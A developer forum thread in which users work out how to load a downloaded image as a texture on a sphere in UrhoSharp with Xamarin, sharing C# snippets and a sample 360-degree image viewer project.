BusinessPartner[]). Now we can simply send a response with status code 200 and the business partners retrieved from the SAP S/4HANA system as response body.
Running the Application Locally
Before deploying the application to Cloud Foundry, let’s test the integration locally first. To do so, we need to supply our destination configuration to designate the SAP S/4HANA system to connect to. This can be achieved by running the following command in your command line, or the equivalent for setting environment variables in your shell (the below is for the Windows command prompt):
set destinations=[{"name":"ErpQueryEndpoint", "url": "", "username": "myuser", "password":"mypw"}]
Make sure to replace the values for url, username and password with the respective values matching your SAP S/4HANA Cloud system.
If you restart the server using
npm start and navigate to, you should see a list of business partners retrieved from your SAP S/4HANA Cloud system.
Deploying the Application to Cloud Foundry
In order to deploy the application on Cloud Foundry, we need to provide a deployment descriptor in the form of a
manifest.yml file. Add this file to the root directory of your application.
--- applications: - name: example-app memory: 256M random-route: true buildpacks: - nodejs_buildpack command: npm start env: destinations: > [ { "name": "ErpQueryEndpoint", "url": "", "username": "<USERNAME>", "password": "<PASSWORD>" } ]
Pay attention to the
env section. Here, we provide the destination settings for the SAP S/4HANA system we want to connect to. Simply substitute the value for each entry with the respective values for your SAP S/4HANA system.
Additionally, we need to perform one more addition to our app’s
package.json.
"engines": { "node": "10.14.1" }
This tells npm which version of Node.js to use as runtime environment. Omitting this from the
package.json leads to CloudFoundry defaulting to an older version of node. However, the VDM relies on some features only present in newer version of Node.js. Additionally, as in any project, it is good practice to specifiy the version of the runtime environment to protect yourself from errors introduced in unwanted version changes down the line.
The resulting
package.json should look as follows:
{ "name": "example-app", "version": "1.0.0", "description": "Example application using the SAP S/4HANA Cloud SDK for JavaScript.", "scripts": { "start": "ts-node src/server.ts" }, "dependencies": { "express": "^4.16.3", "s4sdk-core": "file:s4sdk/s4sdk-core", "s4sdk-vdm": "file:s4sdk/s4sdk-vdm" }, "devDependencies": { "ts-node": "^7.0.1", "typescript": "^3.0.3" }, "engines": { "node": "10.14.1" } }
Finally, you can push the application by executing
cf push on your command line in the root directory of the application. This uses the Cloud Foundry command line interface (CLI), whose installation is described in this blog post. The
cf CLI will automatically pick up the
manifest.yml. At the end of the deployment,
cf CLI will print the URL under which you can access your application. If you now visit the
/businesspartners route of your application at this URL, you should see a list of business partners that have been retrieved from your SAP S/4HANA system! This requires that the URL of the system you connect to is accessible from Cloud Foundry.
This concludes our tutorial.
Give us Feedback!
Are you excited about the SAP S/4HANA Cloud SDK for JavaScript? Are there features that you would love to see in the future? Or did you have problems completing the tutorial? In any case, we would love to hear your feedback in the comments to this blog post! In case of technical questions, you can also reach out to us on StackOverflow using the tags
s4sdk and
javascript.
Going even further
If you have completed the tutorial up to this point, you are equipped with the basics of extending your SAP S/4HANA Cloud system with a Node.js application. However, so far we have only explored a small part of the SDK’s capabilities. While the SDK for JavaScript is a Beta release and, thus, only supports a subset of the features of the SAP S/4HANA Cloud SDK for Java, we do provide the same capabilities in terms of the Java virtual data model for integrating with your SAP S/4HANA system!
Complex Queries using the VDM
Let’s take a look at a more complex query:
import { BusinessPartner, Customer } from 's4sdk-vdm/business-partner-service'; import { and, or } from 's4sdk-core'; BusinessPartner.requestBuilder() .getAll() .select( BusinessPartner.FIRST_NAME, BusinessPartner.LAST_NAME, BusinessPartner.TO_CUSTOMER.select(Customer.CUSTOMER_FULL_NAME) ) .filter( or( BusinessPartner.BUSINESS_PARTNER_CATEGORY.equals('1'), and( BusinessPartner.FIRST_NAME.equals('Foo'), BusinessPartner.TO_CUSTOMER.filter(Customer.CUSTOMER_NAME.notEquals('bar')) ) ) ) .execute();
Again, we want to retrieve a list of business partners. This time, however, we added a select and a filter clause to our query. This highlights two of the VDM’s advantages over building queries by hand: type-safety and discoverability.
As you can see in the filter clause, you can simply get an overview over which fields are present on the business partner by typing
BusinessPartner. in your editor. The autocompletion of modern editors, such as Visual Studio Code, will then provide a list of suggestions, which you can navigate to find the fields you need, without having to refer to the service’s metadata. Furthermore, we ensure that each query you build is type-safe. This means that if you try to e.g. select a field that does not exist on the respective entity, your editor will report a type mismatch, effectively preventing your from writing incorrect queries.
In this example, we restrict our selection to the business partner’s first and last name. Additionally, we add
Customer, a related entity, to your selection, from which we only use the full name.
The same fields can also be used for filtering. As you can see, you can build arbitrarily complex filter clauses using the
and() and
or() functions. Each field also provides a function for each filter operation that can be used on the respective field. Additionally, we again make sure that the values you provide in the filter clause match the type of the respective field. If, for example, you’d try to filter a string-typed field by a number (e.g.
BusinessPartner.FIRST_NAME.equals(5)), a type mismatch will be reported.
Destinations and Authentication
In the examples so far, we have simply called
execute() in our queries. If no parameter is provided,
execute() will by default try to load a destination named “ErpQueryEndpoint” from your application’s environment variables (the one we configured in the
manifest.yml, remember?). You can of course provide more destinations. If you want to use a specific destination for your OData queries, you do so by passing the destination’s name to the execute call, like this:
execute('MyCustomDestination')
Additionally, we provide the option to pass a destination configuration directly to the VDM.
execute({ url: "", username: "MyUser", password: "MyPassword" })
Finally, if you want to make use of OAuth2 or other means instead of basic authentication, you can also set the
Authorization header directly.
BusinessPartner.requestBuilder() ... .withCustomHeaders({ Authorization: "Bearer <EncodedJWT>" }) .execute()
If you provide an
Authorization header using this mechanism, the VDM will ignore the username and password otherwise provided by any destination configuration.
Hello,
Nice blog, this SDK is really welcomed. I try to use it to connect to my on premise backend, through destination/connectivity bound to cloud connector. Though this may not be its primary purpose, can you provide me some hints on how to define destinations with proxy?
DestinationConfiguration does not accept parameters such as proxy. Is there a workaround to set proxy configuration in the underlying axios request?
Hello Kim,
in the beta, we do not natively support the Cloud Connector (in contrast to the SAP S/4HANA Cloud SDK for Java, where this is handled by the SDK).
With the beta of the SDK for JavaScript, you would have to implement the necessary communication with the destination and connectivity service yourself and apply the resulting HTTP headers with the withCustomHeaders method mentioned above. Regarding proxy, I believe you can define a global proxy configuration for axios with axios.defaults.proxy, but I haven't tried to apply this with the Cloud Connector.
Best regards,
Henning
Hello Henning,
Nice suggestion, I did not look into default configuration options of axios. It works, I actually used the axios interceptor to be able to filter on backend URLs.
Something like:
Thank you for your help!
Hello all,
at the moment is it possible to execute a request with expand parameter? for example
my request code is something like
I don't find a method like expand o similar
Thank you for your help!
Hi Donato,
you can handlle expand in the select function, e,g.:
This would select the FirstName of BusinessPartner, the full related Customer entity, as well as the City Code of all related BusinessPartnerAddresses.
Hope that helps!
Hi Dennis,
Thank you so much! now it works fine
Thanks a lot for your blog, it's amazing!
|
https://blogs.sap.com/2018/10/02/writing-an-example-application-using-the-sap-s4hana-cloud-sdk-for-javascript-beta/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Creating styleguides has been always hard work. It can take not only a huge amount of time, especially if you want to make it interactive, and it usually gets out of date as time goes by.
Vue-styleguidist is a nice and easy-to-use tool to create component style guides with interactive documentation in Vue.js. While Storybook for Vue has a manual approach to create interactive docs, vue-styleguidist statically analyzes your source code creating the docs automatically.
🐊 Alligator.io recommends ⤵The Vue.js Master Class from Vue School
Setup vue-styleguidist
In your Vue.js project, install
vue-styleguidist as a dev dependency from npm:
$ npm install --save-dev vue-styleguidist
Add the following two npm scripts to your package.json file:
package.json
{ "scripts": { "styleguide": "vue-styleguidist server", "styleguide:build": "vue-styleguidist build" } }
Finally, you have to setup some webpack config in order to make it work. If you already have a webpack.config.js in your project’s root, vue-styleguidist will load that config.
If that’s not the case, you must create a styleguide.config.js in your project’s root. In there, you could add the webpack config by loading it from another file:
styleguide.config.js
module.exports = { webpackConfig: require('./somewhere/webpack.config.js') };
Or you could even load a different webpack config:
styleguide.config.js
module.exports = { webpackConfig: { module: { rules: [ { test: /\.vue$/, exclude: /node_modules/, loader: "vue-loader" } // For js or css files: { test: /\.js?$/, exclude: /node_modules/, loader: "babel-loader" }, { test: /\.css$/, loader: "style-loader!css-loader" } ] } } };
In any case, remember to install the loaders you’re using, at least
vue-loader.
Note that your project doesn’t have to use webpack. You could use other bundlers like Poi or Parcel. Styleguidist uses webpack internally, but it’s only needed for the required loaders.
Documenting a Component
vue-styleguidist will look for components using the glob pattern
src/components/**/*.vue, but you can configure it using the
components key in the styleguide.config.js file:
styleguide.config.js
module.exports = { components: "src/**/*.vue" };
Using the default convention, let’s create the file
src/components/AppButton.vue and paste the following simple component:
AppButton.vue
<template> <button : <slot></slot> </button> </template> <script> export default { name: "app-button", props: { color: { type: String, default: "black" }, background: { type: String, default: "white" } }, computed: { styles() { return { color: this.color, background: this.background }; } }, methods: { handleClick(e) { this.$emit("click", e); } } }; </script>
The
name component option is required.
Now run
npm run styleguide, and you can navigate to the url displayed in the console, usually. Out of the box, you’ll see the props are already documented on the component doc.
Keep in mind that only the components ins and outs must be documented. In Vue.js, those are props, slots and events.
Props
As you could see, props are documented by default using the
type and
default values, but we can add more options by adding JSDoc comments.
For example, we could add a description to the props:
AppButton.vue
{ props: { /** * Sets the button font color */ color: { type: String, default: "black" }, /** * Sets background color of the button */ background: { type: String, default: "white" } } };
We could also mention that the
background property is available since version 1.2.0 by using
@since:
AppButton.vue
{ props: { /** Sets background color of the button * @since 1.2.0 */ background: { type: String, default: "white" } } };
As another example, we can mark a property as deprecated using
@deprecated. That property will look crossed out:
AppButton.vue
{ props: { /** Sets the button font color * @deprecated Use color instead */ oldColor: String } };
Slots
Slots can be documented by using an html-like comment right before the
<slot> tag, using the
@slot doc tag:
AppButton.vue
<template> <button : <!-- @slot Use this slot to place the button content --> <slot></slot> </button> </template>
You can use as many @slot comments as the number of slots you have, in case you use named slots.
Events
In Vue.js, events are emitted using
this.$emit() function anywhere within methods.
Given that fact, events are documented by adding an
@event comment, and it can be placed anywhere in the method where it’s emitted. They usually go along with
@type in order to define the event payload type.
For clarity, I’d suggest placing them on the method definition:
AppButton.vue
{ methods: { /** Triggered when button is clicked * @event click * @type {Event} */ handleClick(e) { this.$emit("click", e); } } }
If you emit several events, you can place just as many comments:
AppButton.vue
{ methods: { /** Triggered when button is clicked * @event click * @type {Event} */ /** Event for Alligator's example * @event gator * @type {Event} */ handleClick(e) { this.$emit("click", e); this.$emit("gator", e); } } }
Mixins
Mixins are objects which can contain props, methods and other logic to share between components.
Aside from documenting their props and events, they must include a
@mixin doc tag in order to be recognized by vue-styleguidist.
For example, let’s create the following mixin:
sizeMixin.js
/** * @mixin */ export default { props: { /** * Set size of the element */ size: { type: String, default: "14px" } } };
And use it in the AppButton.vue component:
AppButton.vue
import sizeMixin from "./sizeMixin"; export default { name: "app-button", mixins: [sizeMixin], //... }
Then, if you still have the styleguidist server running, you’ll see that the
size prop got merged with the AppButton props.
Extended Docs and Examples
There are a few ways to add more docs to the component:
- Adding a Readme.md file, if your component is within its own folder.
- Adding a .md file with the same file name of the component.
- Adding a
<docs>...</docs>tag on the .vue file.
Since I like the approach and atomicity of single file components, I’m going for the options of using the
<docs> tag. But you could choose the one you feel most comfortable with, the result is the same.
In there, you can add any static information, but the real potential is with examples. You can create an interactive example of the component just by adding the code like you’d do it in a markdown file.
The simplest form is by tagging the code blocks as
jsx:
```jsx <app-buttonPush Me</app-button> ```
And for more complex examples, you could create your own vue instance, tagged as
js:
```js new Vue({ data: () => ({ message: '' }), template: ` <div> <app-button Push Me </app-button> {{message}} </div> ` }) ```
Let’s therefore add a few examples to our
AppButton component:
<docs> This button is amazing, use it responsibly. ## Examples Orange button: ```jsx <app-buttonPush Me</app-button> ``` Ugly button with pink font and blue background: ```jsx <app-button Ugly button </app-button> ``` Button containing custom tags: ```jsx <app-button> Text with <b>bold</b> </app-button> ``` </docs>
Wrapping Up
vue-styleguidist gives us a very easy and automated way to add docs to our components, ending up in a fully featured interactive style guide that other developers and designers can use and play around with.
You can download the complete example from this github repo.
Stay cool 🦄
|
https://alligator.io/vuejs/vue-styleguidist/
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
strnicmp()
Compare two strings up to a given length, ignoring case
Synopsis:
#include <string.h> int strnicmp( const char* s1, const char* s2, size_t len );
Since:
BlackBerry 10.0.0
Arguments:
- s1, s2
- The strings that you want to compare.
- len
- The maximum number of characters that you want to compare.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The strnicmp() function compares up to len characters from the strings pointed to by s1 and s2, ignoring case.
Returns:
- < 0
- s1 is less than s2.
- 0
- s1 is equal to s2.
- > 0
- s1 is greater than s2.
Examples:
#include <stdio.h> #include <stdlib.h> #include <string.h> int main( void ) { printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 10 ) ); printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 6 ) ); printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 3 ) ); printf( "%d\n", strnicmp( "abcdef", "ABCXXX", 0 ) ); return EXIT_SUCCESS; }
produces the output:
-20 -20 0 0
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
|
https://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/s/strnicmp.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Free Chapter from "Scala in Depth": Using None instead of Null
Free Chapter from "Scala in Depth": Using None instead of Null
Join the DZone community and get the full member experience.Join For Free
Joshua D. Suereth
An Option can be considered a container of something or nothing. This is done through the two subclasses of Option: Some and None. In this article from chapter 2 of Scala in Depth, author Joshua Suereth discusses advanced Option techniques.
Using None instead of Null
Scala does its best to discourage the use of null in general programming. It does this through the scala.Option class found in the standard library. An Option can be considered a container of something or nothing. This is done through the two subclasses of Option: Some and None. Some denotes a container of exactly one item. None denotes an empty container, a role similar to what Nil plays for List.
In Java and other languages that allow null, null is often used as a placeholder to denote a nonfatal error as a return value or to denote that a variable is not yet initialized. In Scala, you can denote this through the None subclass of Option. Conversely, you can denote an initialized or nonfatal variable state through the Some subclass of Option. Let’s take a look at the usage of these two classes.
Listing 1 Simple usage of Some and None
scala> var x : Option[String] = None #1
x: Option[String] = None
scala> x.get #2
java.util.NoSuchElementException: None.get in
scala> x.getOrElse("default") #3
res0: String = default
scala> x = Some("Now Initialized") #4
x: Option[String] = Some(Now Initialized)
scala> x.get #5
res0: java.lang.String = Now Initialized
scala> x.getOrElse("default") #6
res1: java.lang.String = Now Initialized
#1 Create uninitialized String variable
#2 Access uninitialized throws exception
#3 Access using default
#4 Initialize x with a string
#5 Access initialized variable works
#6 Default is not used
An Option containing no value can be constructed via the None object. An Option that contains a value is created via the Some factory method. Option provides many ways of retrieving values from its inside. Of particular use are the get and getOrElse methods. The get method will attempt to access the value stored in an Option and throw an exception if it is empty. This is very similar to accessing nullable values within other languages. The getOrElse method will attempt to access the value stored in an Option, if one exists, otherwise it will return the value supplied to the method. You should always prefer getOrElse over using get.
Scala provides a factory method on the Object companion object that will convert from a Java style reference—where null implies an empty variable—into an Option where this is more explicit. Let’s take a quick look.
Listing 2 Usage of the Option factory
scala> var x : Option[String] = Option(null) x: Option[String] = None scala> x = Option("Initialized") x: Option[String] = Some(Initialized)
The Option factory method will take a variable and create a None object if the input was null, or a Some if the input was initialized. This makes it rather easy to take inputs from an untrusted source, such as another JVM language, and wrap them into Options. You might be asking yourself why you would want to do this. Isn’t checking for null just as simple in code? Well, Option provides a few more advanced features that make it far more ideal then simply using if null checks.
Advanced Option techniques
The greatest feature of Option is that you can treat it as a Collection. This means you can perform the standard map, flat Map, and foreach methods and utilize them inside a for expression. Not only does this help to ensure a concise syntax, but opens up a variety of different methods for handling uninitialized values.
Let’s take a look at some common Null-related issues solved using Option, starting with creating an object or returning a default.
Creating a new object or returning a default
Many times, you need to construct something with some other variable or supply some sort of default. Let’s pretend that we have an application that requires some kind of temporary file storage for its execution. The application is designed so that a user may be able to specify a directory to store temporary files on the command line. If the user does not specify a new file, if the argument provided by the user is not a real directory, or they did not provide a directory, then we want to return a sensible default temporary directory. Let’s create a method that will give our temporary directory.
Listing 3 Creating an object or returning a default
def getTemporaryDirectory(tmpArg : Option[String]) : java.io.File = { tmpArg.map(name => new java.io.File(name)). filter(_.isDirectory). getOrElse(new java.io.File(System.getProperty("java.io.tmpdir"))) }
#1 Create if defined
#2 Only directories
#3 Specify Default
The getTemporaryDirectory method takes the command line parameter as an Option containing a String and returns a File object referencing the temporary directory we should use. The first thing we do is use the map method on Option to create a java.io.File if there was a parameter. Next, we make sure that this newly constructed file object is a directory. To do that, we use the filter method. This will check whether the value in an Option abides by some predicate and, if not, convert to a None. Finally, we check to see if we have a value in the Option; otherwise, we return the default temporary directory.
This enables a very powerful set of checks without resorting to nested if statements or blocks. There are times where we would like a block, such as when we want to execute a block of code based on the availability of a particular parameter.
Executing block of code if variable is initialized
Option can be used to execute a block of code if the Option contains a value. This is done through the for each method, which, as expected, iterates over all the elements in the Option. As an Option can only contain zero or one value, this means the block either executes or is ignored. This syntax works particularly well with for expressions. Let’s take a quick look.
Listing 4 Executing code if option is defined
val username : Option[String] = ... for(uname <- username) { println("User: " + uname) }
As you can see, this looks like a normal "iterate over a collection" control block. The syntax remains quite similar when we need to iterate over several variables. Let’s look at the case where we have some kind of Java Servlet framework and we want to be able to authenticate users. If authentication is possible, we want to inject our security token into the HttpSession so that later filters and servlets can check access privileges for this user.
Listing 5 Executing code if several options are defined
def authenticateSession(session : HttpSession, username : Option[String], password : Option[Array[Char]]) = { for(u <- username; p <- password; if canAuthenticate(username, password)) { #1 val privileges = privilegesFor(u) #2 injectPrivilegesIntoSession(session, privileges) } }
#1 Conditional logic
#2 No need for Option
Notice that you can embed conditional logic in a for expression. This helps keep less nested logical blocks within your program. Another important consideration is that all the helper methods do not need to use the Option class.
Option works as a great front-line defense for potentially uninitialized variables; however, it does not need to pollute the rest of your code. In Scala, Option as an argument implies that something may not be initialized—its convention to make the opposite true, that is: functions should not be passed as null or uninitialized parameters.
Scala’s for expression syntax is rather robust, even allowing you to produce values rather than execute code blocks. This is especially handy when you have a set of potentially uninitialized parameters that you want to transform into something else.
Using several potential uninitialized variables to construct another variable
Sometimes we want to transform a set of potentially uninitialized values so that we only have to deal with one. To do this, we’re going to use a for expression again, but this time using a yield. Let’s look at the case where a user has input some database credentials or we attempted to read them from an encrypted location and we want to create a database connection using these parameters. We don’t want to deal with failure in our function because this is a utility function that will not have access to the user. In this case, we’d like to just transform our database connection configuration parameters into a single option containing our database.
Listing 6 Merging options
def createConnection(conn_url : Option[String], conn_user : Option[String], conn_pw : Option[String]) : Option[Connection] = for { url <- conn_url user <- conn_user pw <- conn_pw } yield DriverManager.getConnection(url, user, pw)
This function does exactly what we need it to. It does seem though that we are merely deferring all logic to DriverManager.getConnection. What if we wanted to abstract this such that we can take any function and create one that is option friendly in the same manner? Take a look at what we’ll call the lift function:
Listing 7 Generically converting functions
scala> def lift3[A,B,C,D](f : Function3[A,B,C,D]) : Function3[Option[A], Option[B], Option[C], Option[D]] = | (oa : Option[A], ob : Option[B], oc : Option[C]) => | for(a <- oa; b <- ob; c <- oc) yield f(a,b,c) | } lift3: [A,B,C,D](f: (A, B, C) => D)(Option[A], Option[B], Option[C]) => Option[D] scala> lift3(DriverManager.getConnection) #1 res4: (Option[java.lang.String], Option[java.lang.String], Option[java.lang.String])
#1 Using lift3 directly
The lift 3 method looks somewhat like our earlier createConnection method, except that it takes a function as its sole parameter. As you can see from the REPL output, we can use this against existing functions to create option-friendly functions. We’ve directly taken the DriverManager.getConnection method and lifted it into something that is semantically equivalent to our earlier createConnection method. This technique works well when used with the encapsulation of uninitialized variables. You can write most of your code, even utility methods, assuming that everything is initialized, and then lift these functions into Option friendly as appropriate.
Summary
Scala provides a class called Option that allows developers to relax the amount of protection they need when dealing with null. Option can help to improve reasonability of the code by clearly delineated where uninitialized values are accepted.
Here are some other Manning titles you might be interested in:
Last updated: August 15, 2011
Opinions expressed by DZone contributors are their own.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }}
|
https://dzone.com/articles/free-chapter-scala-depth-using
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
VueFace
VueFace is an open source component library for VueJS framework with around 40 components at the moment. It supports 20+ themes for giving different look & feel for all the components.
Follow me @SudheerJonna for technical updates.
Install
VueFace is available in NPM and you can add to your project as a dependency as below
npm install --save vueface
Quick start
The VueFace library need to be configured before going to use the components
import Vue from 'vue' import VueFace from 'vueface' Vue.use(VueFace)
Configure styles for your components in your home.vue/index.html. Forexample, add below resources to home.vue as below
<style id="current-theme" lang="css" src="node_modules/src/assets/themes/omega/theme.css"></style> <style lang="css" src="node_modules/src/assets/vue-face.css"></style> <style lang="css" src="node_modules/font-awesome/css/font-awesome.min.css"></style>
Demo
The showcase is available here() for each component and their features.
How to Run
build for production with minification
npm run build
serve with hot reload at localhost:8080
npm start
LICENSE
MIT
|
https://nicedoc.io/sudheerj/vueface
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
img_decode_validate()
Find a codec for decoding
Synopsis:
#include <img/img.h> int img_decode_validate( const img_codec_t* codecs, size_t ncodecs, io_stream_t* input, unsigned* codec );
Arguments:
- codecs
- A pointer to an array of img_codec_t handles providing a list of codecs to try. The function will try each codec in order until it finds one that validates the data in the stream.
- ncodecs
- The number of items in the codecs array.
- input
- The input source.
- codec
- The address of an unsigned value where the function stores the index of the codec that validated the datastream. This memory is left untouched if no such codec is found.
Library:
libimg
Use the -l img option to qcc to link against this library.
Description:
This function finds a suitable codec for decoding.
Returns:
Status of the operation:
- IMG_ERR_OK
- Success; an appropriate codec was found. Check codec for the index of the codec in the codecs array which validated the datastream.
- IMG_ERR_DLL
- An error occurred processing the DLL that handles the file type. Check to make sure that the DLL is not missing or corrupt.
- IMG_ERR_FORMAT
- No installed codec recognized the input data as a format it supports. This could mean the data is of a format that's not supported, or the datastream is corrupt.
- IMG_ERR_NOTIMPL
- The codec that recognized the input data as the format it supports doesn't have a validate method.
Classification:
Image library
|
http://developer.blackberry.com/playbook/native/reference/com.qnx.doc.neutrino.lib_ref/topic/i/img_decode_validate.html
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
Azure Kubernetes Service (A.
You can create an AKS cluster in the Azure portal, with the Azure CLI, or template driven deployment options such as Resource Manager templates and Terraform. When you deploy an AKS cluster, the Kubernetes master and all nodes are deployed and configured for you. Additional features such as advanced networking, Azure Active Directory integration, and monitoring can also be configured during the deployment process. Windows Server containers support is currently in preview in AKS.
For more information on Kubernetes basics, see Kubernetes core concepts for AKS.
To get started, complete the AKS quickstart in the Azure portal or with the Azure CLI.
Access, security, and monitoring
For improved security and management, AKS lets you integrate with Azure Active Directory and use Kubernetes role-based access controls. You can also monitor the health of your cluster and resources.
Identity and security management
To limit access to cluster resources, AKS supports Kubernetes role-based access control (RBAC). RBAC lets you control access to Kubernetes resources and namespaces, and permissions to those resources. You can also configure an AKS cluster to integrate with Azure Active Directory (AD). With Azure AD integration, Kubernetes access can be configured based on existing identity and group membership. Your existing Azure AD users and groups can be provided access to AKS resources and with an integrated sign-on experience.
For more information on identity, see Access and identity options for AKS.
To secure your AKS clusters, see Integrate Azure Active Directory with AKS.
Integrated logging and monitoring
To understand how your AKS cluster and deployed applications are performing, Azure Monitor for container health collects memory and processor metrics from containers, nodes, and controllers. Container logs are available, and you can also review the Kubernetes master logs. This monitoring data is stored in an Azure Log Analytics workspace, and is available through the Azure portal, Azure CLI, or a REST endpoint.
For more information, see Monitor Azure Kubernetes Service container health.
Clusters and nodes
AKS nodes run on Azure virtual machines. You can connect storage to nodes and pods, upgrade cluster components, and use GPUs. AKS supports Kubernetes clusters that run multiple node pools to support mixed operating systems and Windows Server containers (currently in preview). Linux nodes run a customized Ubuntu OS image, and Windows Server nodes run a customized Windows Server 2019 OS image.
Cluster node and pod scaling
As demand for resources change, the number of cluster nodes or pods that run your services can automatically scale up or down. You can use both the horizontal pod autoscaler or the cluster autoscaler. This approach to scaling lets the AKS cluster automatically adjust to demands and only run the resources needed.
For more information, see Scale an Azure Kubernetes Service (AKS) cluster.
Cluster node upgrades
Azure Kubernetes Service offers multiple Kubernetes versions. As new versions become available in AKS, your cluster can be upgraded.
Storage volume support
To support application workloads, you can mount storage volumes for persistent data. Both static and dynamic volumes can be used. Depending on how many connected pods are to share the storage,, and other nodes in the virtual network. Pods can connect also to other services in a peered virtual network, and to on-premises networks over ExpressRoute or site-to-site (S2S) VPN connections.
For more information, see the Network concepts for applications in AKS.
To get started with ingress traffic, see HTTP application routing.
Ingress with HTTP application routing
The HTTP application routing add-on makes it easy to access applications deployed to your AKS cluster. When enabled, the HTTP application routing solution configures an ingress controller in your AKS cluster. As applications are deployed, publicly accessible DNS names are auto configured. The HTTP application routing configures such as Helm, Draft, and the Kubernetes extension for Visual Studio Code. These tools work seamlessly with AKS.
Additionally, Azure Dev Spaces provides a rapid, iterative Kubernetes development experience for teams. With minimal configuration, you can run and debug containers directly in AKS. To get started, see Azure Dev Spaces.
The Azure DevOps project provides a simple solution for bringing existing code and Git repository into Azure. The DevOps project automatically creates Azure resources such as AKS, a release pipeline in Azure DevOps Services that includes a build pipeline for CI, sets up a release pipeline for CD, and then creates an Azure Application Insights resource for monitoring.
For more information, see Azure DevOps project.
Docker image support and private container registry
AKS supports the Docker image format. For private storage of your Docker images, you can integrate AKS with Azure Container Registry (ACR).
To create private image store, see Azure Container Registry.
Kubernetes certification
Azure Kubernetes Service (AKS) has been CNCF certified as Kubernetes conformant.
Regulatory compliance
Azure Kubernetes Service (AKS) is compliant with SOC, ISO, PCI DSS, and HIPAA. For more information, see Overview of Microsoft Azure compliance.
Next steps
Learn more about deploying and managing AKS with the Azure CLI quickstart.
Feedback
|
https://docs.microsoft.com/en-us/azure/aks/intro-kubernetes?WT.mc_id=THOMASMAURER-blog-thmaure
|
CC-MAIN-2019-35
|
en
|
refinedweb
|
I've got a problem to set texture from an image on a sphere. The problem is that texture.Load or texture.SetData always returns false. I did try different methods like SetData, Load, resize texture and image (to a power of 2 number) and ... but none of them worked. Here is my code:
async void CreateScene()
{
Input.SubscribeToTouchEnd(OnTouched);
_scene = new Scene(); _octree = _scene.CreateComponent<Octree>(); _plotNode = _scene.CreateChild(); var baseNode = _plotNode.CreateChild().CreateChild(); var plane = baseNode.CreateComponent<StaticModel>(); plane.Model = CoreAssets.Models.Sphere; var cameraNode = _scene.CreateChild(); _camera = cameraNode.CreateComponent<Camera>(); cameraNode.Position = new Vector3(10, 15, 10) / 1.75f; cameraNode.Rotation = new Quaternion(-0.121f, 0.878f, -0.305f, -0.35f); Node lightNode = cameraNode.CreateChild(); var light = lightNode.CreateComponent<Light>(); light.LightType = LightType.Point; light.Range = 100; light.Brightness = 1.3f; int size = 3; baseNode.Scale = new Vector3(size * 1.5f, 1, size * 1.5f); var imageStream = await new HttpClient().GetStreamAsync("some 512 * 512 jpg image"); var ms = new MemoryStream(); imageStream.CopyTo(ms); var image = new Image(); var isLoaded = image.Load(new MemoryBuffer(ms)); if (!isLoaded) { throw new Exception(); } var texture = new Texture2D(); //var isTextureLoaded = texture.Load(new MemoryBuffer(ms.ToArray())); var isTextureLoaded = texture.SetData(image); if (!isTextureLoaded) { throw new Exception(); } var material = new Material(); material.SetTexture(TextureUnit.Diffuse, texture); material.SetTechnique(0, CoreAssets.Techniques.Diff, 0, 0); plane.SetMaterial(material); try { await _plotNode.RunActionsAsync(new EaseBackOut(new RotateBy(2f, 0, 360, 0))); } catch (OperationCanceledException) { } }
Please help!
@ShahramShobeiri
For me the below works. As an image I used this (put to my Assets/Data/Textures folder).
using Urho; using Urho.Shapes; var app = SimpleApplication.Show(new ApplicationOptions("Data") { Width = 1280, Height = 800 }); app.Viewport.SetClearColor(Color.Black); app.Renderer.MaterialQuality = 15; var sphere = app.RootNode.GetOrCreateComponent<Sphere>(); var i = app.ResourceCache.GetImage("Textures/world.topo.bathy.200401.3x5400x2700.png"); var m = Material.FromImage(i); sphere.SetMaterial(m);
@puneetmahali
Nothing to explain. There are use cases when storing resources (images, textures, etc) is better than manage images dynamically.
But below is an (not optimized) example, how to download the image and use it as texture/material on the fly:
using Urho; using Urho.Resources; using Urho.Shapes; using System.Net; using System.Text; var url = ""; var wc = new WebClient() { Encoding = Encoding.UTF8 }; var app = SimpleApplication.Show(new ApplicationOptions("Data") { Width = 1280, Height = 800 }); app.Viewport.SetClearColor(Color.Black); app.Renderer.MaterialQuality = 15; try { var mb = new MemoryBuffer(wc.DownloadData(url)); var sphere = app.RootNode.GetOrCreateComponent<Sphere>(); var img = new Urho.Resources.Image(app.Context) { Name = "MyImage" }; img.Load(mb); var m = Material.FromImage(img); sphere.SetMaterial(m); } catch (Exception ex) { // do something when an error occurs }
Answers
Hi Shahram,
Can you please send the full project?
Hi @puneetmahali,
Here is the full project:
What about to use Material.FromImage(string) method?
Thanks @laheller
It didn't work either, After Material.FromImage(string) sphere disappears and everything gets black.
@ShahramShobeiri
For me the below works. As an image I used this (put to my Assets/Data/Textures folder).
@laheller
Can you please explain more about (put to my Assets/Data/Textures folder), because if image will be fetch from url then why we need to put the image into the folder also. Because I want to show the multiple images or we can say dynamically.
@laheller
It would be so helpful If you share the working demo project.
@puneetmahali
Nothing to explain. There are use cases when storing resources (images, textures, etc) is better than manage images dynamically.
But below is an (not optimized) example, how to download the image and use it as texture/material on the fly:
@laheller
Thanks for quick reply.
Sounds Cool.
Is the above solution working/executable for both means iOS & Android for you?
Because it's not working and shows the error like failed to add resource path 'Data', check the documentation. I already give the build action BundleResource for iOS & EmbededResource for Droid.
So, It would be so helpful if you can share the executable demo.
Thanks in advance.
@puneetmahali
The app in my example is an instance of Urho.Application or Urho.SimpleApplication.
You have to create your one and use the rest from my example.
It should work on all platforms because of Xamarin
Thank you @laheller, You helped a lot,
My main goal was to create a 360 degree image viewer, I found a NuGet (Swank.FormsPlugin) for this goal but it didn't work for me, So based on Swank.FormsPlugin and @laheller solution, I created a very simple project to show 360 degree images that works!
Here is the project for @laheller
@ShahramShobeiri
